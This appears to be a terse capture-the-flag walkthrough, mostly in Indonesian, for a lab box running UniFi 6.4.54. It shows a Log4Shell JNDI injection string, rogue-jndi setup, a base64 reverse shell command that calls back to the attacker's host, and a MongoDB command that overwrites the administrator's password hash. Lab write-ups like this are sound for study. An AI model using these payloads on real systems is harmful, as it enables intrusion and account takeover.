Unified¶
#Linux
#Web
#CVE
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
6789/tcp open ibm-db2-admin?
8080/tcp open http-proxy
8443/tcp open ssl/nagios-nsca Nagios NSCA
UniFy 6.4.54 exploit
article discuss CVE-2021-44228
langkah selanjutnya exploitasi login page dengan burp suite
edit request json field remember
(why?) dengan "${jndi:ldap://{Tun0 IP Address}/whatever}"
(how?)
JNDI
is the acronym for the Java Naming and Directory Interface API. By making calls to this API, applications locate resources and other program objects. A resource is a program object that provides connections to systems, such as database servers and messaging systems.
LDAP
is the acronym for Lightweight Directory Access Protocol, which is an open, vendor-neutral, industry standard application protocol for accessing and maintaining distributed directory information services over the Internet or a Network. The default port that LDAP runs on is port 389.
karena server memberikan response, maka sistem vulnerable
mencoba analisa paket
menunjukkan kalau target mencoba connect back ke kita atau yang artinya sistem vulnerable
selanjutanya, membuat payload untuk dikirim ke target aplikasi
# keperluan menjalankan aplikasi java
sudo apt update
sudo apt install openjdk-11-jdk
sudo apt install maven
# keperluan aplikasi koneksi LDAP server
git clone https://github.com/veracode-research/rogue-jndi
cd rogue-jndi
mvn package
rogue-jndi/target/RogueJndi-1.1.jar
membuat payload dalam base64 agar tdk ada issues encoding
misal port 4444
run Rogue-JNDI
java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,<BASE64 STRING HERE>}|{base64,-d}|{bash,-i}" --hostname "<your_ip>"
membuat listener
kembali ke burp suite, ubah request
kembali ke listener
didapat user
, lalu mencari privileges
cek Mongo DB
yang memungkinkan mendapat credential
ubah hash password administrator
mongo --port 27117 ace --eval 'db.admin.update({"_id": ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"<SHA_512 Hash Generated>"}})'
cek lagi jika perlu
login ke website dan cari setting->site
ssh authentication setting